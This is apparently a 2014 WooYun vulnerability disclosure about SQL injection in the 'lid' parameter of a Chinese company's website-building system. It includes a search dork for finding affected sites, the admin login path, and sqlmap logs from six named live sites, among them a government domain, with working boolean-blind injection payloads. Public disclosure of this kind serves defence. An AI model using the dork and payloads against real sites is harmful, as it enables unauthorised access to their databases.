当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-072029

漏洞标题:某企业建站系统sql注入漏洞

相关厂商:某企业建站系统

漏洞作者: Mosuan

提交时间:2014-08-12 19:02

修复时间:2014-11-10 19:04

公开时间:2014-11-10 19:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-12: 细节已通知厂商并且等待厂商处理中
2014-08-17: 厂商已经确认,细节仅向厂商公开
2014-08-20: 细节向第三方安全合作伙伴开放
2014-10-11: 细节向核心白帽子及相关领域专家公开
2014-10-21: 细节向普通白帽子公开
2014-10-31: 细节向实习白帽子公开
2014-11-10: 细节向公众公开

简要描述:

rt

详细说明:

新速腾网络技术服务有限公司 这个公司的
关键词

inurl:/news/newsmore.aspx?lid=



暂时没找到他们的官网。
注入参数lid
他们后台路径:STAdmin/admin_login.aspx
access数据库
举几个例子

注入地址:http://www.xjjtsg.com/news/NewsMore.aspx?lid=81
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 02:01:33
[02:01:33] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI
汉化版(1)\sqlmap GUI汉化版\rar\output\www.xjjtsg.com\session' as session file
[02:01:33] [INFO] testing connection to the target url
[02:01:36] [INFO] testing if the url is stable, wait a few seconds
[02:01:38] [INFO] url is stable
[02:01:38] [INFO] testing if GET parameter 'lid' is dynamic
[02:01:39] [INFO] confirming that GET parameter 'lid' is dynamic
[02:01:41] [INFO] GET parameter 'lid' is dynamic
[02:01:42] [WARNING] heuristic test shows that GET parameter 'lid' might not be
injectable
[02:01:42] [INFO] testing sql injection on GET parameter 'lid'
[02:01:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:01:52] [INFO] GET parameter 'lid' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
[02:01:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:01:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:01:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[02:01:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[02:01:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:01:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[02:01:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[02:02:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[02:02:01] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:02:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[02:02:03] [INFO] testing 'Oracle AND time-based blind'
[02:02:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:02:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:02:19] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[02:02:33] [INFO] checking if the injection point on GET parameter 'lid' is a fa
lse positive
GET parameter 'lid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N]
sqlmap identified the following injection points with a total of 42 HTTP(s) requ
ests:
---
Place: GET
Parameter: lid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lid=81 AND 4304=4304
---
[02:02:42] [INFO] testing MySQL
[02:02:42] [WARNING] the back-end DBMS is not MySQL
[02:02:42] [INFO] testing Oracle
[02:02:42] [WARNING] the back-end DBMS is not Oracle
[02:02:42] [INFO] testing PostgreSQL
[02:02:42] [WARNING] the back-end DBMS is not PostgreSQL
[02:02:42] [INFO] testing Microsoft SQL Server
[02:02:42] [WARNING] the back-end DBMS is not Microsoft SQL Server
[02:02:42] [INFO] testing SQLite
[02:02:42] [WARNING] the back-end DBMS is not SQLite
[02:02:42] [INFO] testing Microsoft Access
[02:02:43] [INFO] confirming Microsoft Access
[02:02:43] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
[02:02:43] [WARNING] on Microsoft Access it is not possible to enumerate databas
es
[02:02:43] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 41 times
[02:02:43] [INFO] Fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.xjjt
sg.com'
[*] shutting down at 02:02:43


注入地址:http://www.xjtriz.gov.cn/news/newsmore.aspx?lid=89
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 01:58:02
[01:58:02] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI
汉化版(1)\sqlmap GUI汉化版\rar\output\www.xjtriz.gov.cn\session' as session file
[01:58:02] [INFO] testing connection to the target url
[01:58:04] [INFO] testing if the url is stable, wait a few seconds
[01:58:07] [WARNING] url is not stable, sqlmap will base the page comparison on
a sequence matcher. If no dynamic nor injectable parameters are detected, or in
case of junk results, refer to user's manual paragraph 'Page comparison' and pro
vide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[01:58:09] [INFO] testing if GET parameter 'lid' is dynamic
[01:58:10] [INFO] confirming that GET parameter 'lid' is dynamic
[01:58:11] [INFO] GET parameter 'lid' is dynamic
[01:58:11] [WARNING] heuristic test shows that GET parameter 'lid' might not be
injectable
[01:58:11] [INFO] testing sql injection on GET parameter 'lid'
[01:58:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:58:22] [INFO] GET parameter 'lid' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
[01:58:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[01:58:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:58:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:58:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[01:58:30] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:58:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:58:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:58:36] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:58:38] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:58:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:58:41] [INFO] testing 'Oracle AND time-based blind'
[01:58:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:59:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:59:05] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[01:59:40] [INFO] checking if the injection point on GET parameter 'lid' is a fa
lse positive
[02:00:28] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
GET parameter 'lid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N]
sqlmap identified the following injection points with a total of 42 HTTP(s) requ
ests:
---
Place: GET
Parameter: lid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lid=89 AND 4528=4528
---
[02:01:14] [INFO] testing MySQL
[02:01:14] [WARNING] the back-end DBMS is not MySQL
[02:01:14] [INFO] testing Oracle
[02:01:14] [WARNING] the back-end DBMS is not Oracle
[02:01:14] [INFO] testing PostgreSQL
[02:01:14] [WARNING] the back-end DBMS is not PostgreSQL
[02:01:14] [INFO] testing Microsoft SQL Server
[02:01:14] [WARNING] the back-end DBMS is not Microsoft SQL Server
[02:01:14] [INFO] testing SQLite
[02:01:15] [WARNING] the back-end DBMS is not SQLite
[02:01:15] [INFO] testing Microsoft Access
[02:01:15] [INFO] confirming Microsoft Access
[02:01:15] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
[02:01:15] [WARNING] on Microsoft Access it is not possible to enumerate databas
es
[02:01:15] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 41 times
[02:01:15] [INFO] Fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.xjtr
iz.gov.cn'
[*] shutting down at 02:01:15


注入地址:http://www.xjxtczg.com/news/NewsMore.aspx?lid=70
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 02:05:22
[02:05:22] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI
汉化版(1)\sqlmap GUI汉化版\rar\output\www.xjxtczg.com\session' as session file
[02:05:22] [INFO] testing connection to the target url
[02:05:25] [INFO] testing if the url is stable, wait a few seconds
[02:05:28] [INFO] url is stable
[02:05:28] [INFO] testing if GET parameter 'lid' is dynamic
[02:05:30] [INFO] confirming that GET parameter 'lid' is dynamic
[02:05:33] [INFO] GET parameter 'lid' is dynamic
[02:05:34] [WARNING] heuristic test shows that GET parameter 'lid' might not be
injectable
[02:05:34] [INFO] testing sql injection on GET parameter 'lid'
[02:05:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:05:40] [INFO] GET parameter 'lid' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
[02:05:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:05:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:05:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[02:05:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[02:05:41] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:05:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[02:05:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[02:05:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[02:05:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:05:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[02:05:42] [INFO] testing 'Oracle AND time-based blind'
[02:05:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:05:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:05:44] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[02:05:59] [INFO] checking if the injection point on GET parameter 'lid' is a fa
lse positive
GET parameter 'lid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N]
sqlmap identified the following injection points with a total of 42 HTTP(s) requ
ests:
---
Place: GET
Parameter: lid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lid=70 AND 1111=1111
---
[02:06:26] [INFO] testing MySQL
[02:06:26] [WARNING] the back-end DBMS is not MySQL
[02:06:26] [INFO] testing Oracle
[02:06:26] [WARNING] the back-end DBMS is not Oracle
[02:06:26] [INFO] testing PostgreSQL
[02:06:27] [WARNING] the back-end DBMS is not PostgreSQL
[02:06:27] [INFO] testing Microsoft SQL Server
[02:06:27] [WARNING] the back-end DBMS is not Microsoft SQL Server
[02:06:27] [INFO] testing SQLite
[02:06:27] [WARNING] the back-end DBMS is not SQLite
[02:06:27] [INFO] testing Microsoft Access
[02:06:31] [INFO] confirming Microsoft Access
[02:06:34] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
[02:06:34] [WARNING] on Microsoft Access it is not possible to enumerate databas
es
[02:06:34] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 41 times
[02:06:34] [INFO] Fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.xjxt
czg.com'
[*] shutting down at 02:06:34


注入地址:http://www.flgxjc.com/news/NewsMore.aspx?lid=58
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 02:08:44
[02:08:44] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI
汉化版(1)\sqlmap GUI汉化版\rar\output\www.flgxjc.com\session' as session file
[02:08:44] [INFO] testing connection to the target url
[02:08:46] [INFO] testing if the url is stable, wait a few seconds
[02:08:48] [INFO] url is stable
[02:08:48] [INFO] testing if GET parameter 'lid' is dynamic
[02:08:50] [INFO] confirming that GET parameter 'lid' is dynamic
[02:08:51] [INFO] GET parameter 'lid' is dynamic
[02:08:52] [WARNING] heuristic test shows that GET parameter 'lid' might not be
injectable
[02:08:52] [INFO] testing sql injection on GET parameter 'lid'
[02:08:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:09:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[02:09:17] [INFO] GET parameter 'lid' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
[02:09:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:09:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:09:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[02:09:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[02:09:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:09:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[02:09:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[02:09:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[02:09:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:09:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[02:09:22] [INFO] testing 'Oracle AND time-based blind'
[02:09:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:09:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:09:28] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[02:09:34] [INFO] checking if the injection point on GET parameter 'lid' is a fa
lse positive
GET parameter 'lid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N]
sqlmap identified the following injection points with a total of 42 HTTP(s) requ
ests:
---
Place: GET
Parameter: lid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lid=58 AND 1719=1719
---
[02:10:02] [INFO] testing MySQL
[02:10:02] [WARNING] the back-end DBMS is not MySQL
[02:10:02] [INFO] testing Oracle
[02:10:03] [WARNING] the back-end DBMS is not Oracle
[02:10:03] [INFO] testing PostgreSQL
[02:10:03] [WARNING] the back-end DBMS is not PostgreSQL
[02:10:03] [INFO] testing Microsoft SQL Server
[02:10:04] [WARNING] the back-end DBMS is not Microsoft SQL Server
[02:10:04] [INFO] testing SQLite
[02:10:04] [WARNING] the back-end DBMS is not SQLite
[02:10:04] [INFO] testing Microsoft Access
[02:10:05] [INFO] confirming Microsoft Access
[02:10:05] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
[02:10:05] [WARNING] on Microsoft Access it is not possible to enumerate databas
es
[02:10:05] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 41 times
[02:10:05] [INFO] Fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.flgx
jc.com'
[*] shutting down at 02:10:05


注入地址:http://bjhfy.net.cn/news/newsmore.aspx?lid=17
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 02:10:07
[02:10:07] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI
汉化版(1)\sqlmap GUI汉化版\rar\output\bjhfy.net.cn\session' as session file
[02:10:07] [INFO] testing connection to the target url
[02:10:08] [INFO] heuristics detected web page charset 'GB2312'
[02:10:08] [INFO] testing if the url is stable, wait a few seconds
[02:10:10] [INFO] url is stable
[02:10:10] [INFO] testing if GET parameter 'lid' is dynamic
[02:10:11] [INFO] confirming that GET parameter 'lid' is dynamic
[02:10:12] [INFO] GET parameter 'lid' is dynamic
[02:10:13] [WARNING] heuristic test shows that GET parameter 'lid' might not be
injectable
[02:10:13] [INFO] testing sql injection on GET parameter 'lid'
[02:10:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:10:15] [INFO] GET parameter 'lid' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
[02:10:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:10:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:10:15] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[02:10:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[02:10:16] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:10:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[02:10:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[02:10:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[02:10:17] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:10:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[02:10:17] [INFO] testing 'Oracle AND time-based blind'
[02:10:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:10:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:10:19] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[02:10:20] [INFO] checking if the injection point on GET parameter 'lid' is a fa
lse positive
GET parameter 'lid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N]
sqlmap identified the following injection points with a total of 42 HTTP(s) requ
ests:
---
Place: GET
Parameter: lid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lid=17 AND 9778=9778
---
[02:10:27] [INFO] testing MySQL
[02:10:57] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[02:11:10] [WARNING] the back-end DBMS is not MySQL
[02:11:10] [INFO] testing Oracle
[02:11:10] [WARNING] the back-end DBMS is not Oracle
[02:11:10] [INFO] testing PostgreSQL
[02:11:10] [WARNING] the back-end DBMS is not PostgreSQL
[02:11:10] [INFO] testing Microsoft SQL Server
[02:11:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
[02:11:11] [INFO] testing SQLite
[02:11:11] [WARNING] the back-end DBMS is not SQLite
[02:11:11] [INFO] testing Microsoft Access
[02:11:12] [INFO] confirming Microsoft Access
[02:11:18] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
[02:11:18] [WARNING] on Microsoft Access it is not possible to enumerate databas
es
[02:11:18] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 21 times
[02:11:18] [INFO] Fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\bjhfy.ne
t.cn'
[*] shutting down at 02:11:18


注入地址:http://www.xjdqgg.com/news/NewsMore.aspx?lid=81
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 02:11:38
[02:11:39] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI
汉化版(1)\sqlmap GUI汉化版\rar\output\www.xjdqgg.com\session' as session file
[02:11:39] [INFO] testing connection to the target url
[02:11:44] [INFO] testing if the url is stable, wait a few seconds
[02:11:48] [INFO] url is stable
[02:11:48] [INFO] testing if GET parameter 'lid' is dynamic
[02:11:52] [INFO] confirming that GET parameter 'lid' is dynamic
[02:11:56] [INFO] GET parameter 'lid' is dynamic
[02:11:57] [WARNING] heuristic test shows that GET parameter 'lid' might not be
injectable
[02:11:57] [INFO] testing sql injection on GET parameter 'lid'
[02:11:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:12:03] [INFO] GET parameter 'lid' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
[02:12:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:12:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:12:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[02:12:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[02:12:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:12:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[02:12:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[02:12:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[02:12:15] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:12:15] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[02:12:16] [INFO] testing 'Oracle AND time-based blind'
[02:12:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:12:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:12:21] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[02:12:27] [INFO] checking if the injection point on GET parameter 'lid' is a fa
lse positive
GET parameter 'lid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N]
sqlmap identified the following injection points with a total of 42 HTTP(s) requ
ests:
---
Place: GET
Parameter: lid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lid=81 AND 7728=7728
---
[02:13:25] [INFO] testing MySQL
[02:13:39] [WARNING] the back-end DBMS is not MySQL
[02:13:39] [INFO] testing Oracle
[02:13:39] [WARNING] the back-end DBMS is not Oracle
[02:13:39] [INFO] testing PostgreSQL
[02:13:40] [WARNING] the back-end DBMS is not PostgreSQL
[02:13:40] [INFO] testing Microsoft SQL Server
[02:13:40] [WARNING] the back-end DBMS is not Microsoft SQL Server
[02:13:40] [INFO] testing SQLite
[02:13:43] [WARNING] the back-end DBMS is not SQLite
[02:13:43] [INFO] testing Microsoft Access
[02:13:46] [INFO] confirming Microsoft Access
[02:13:47] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
[02:13:47] [WARNING] on Microsoft Access it is not possible to enumerate databas
es
[02:13:47] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 41 times
[02:13:47] [INFO] Fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.xjdq
gg.com'
[*] shutting down at 02:13:47

漏洞证明:

function

修复方案:

过滤

版权声明:转载请注明来源 Mosuan@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-08-17 13:05

厂商回复:

CNVD确认所述情况,但未能直接建立与厂商的联系处处置渠道,暂无法一一处置。待认领。

最新状态:

暂无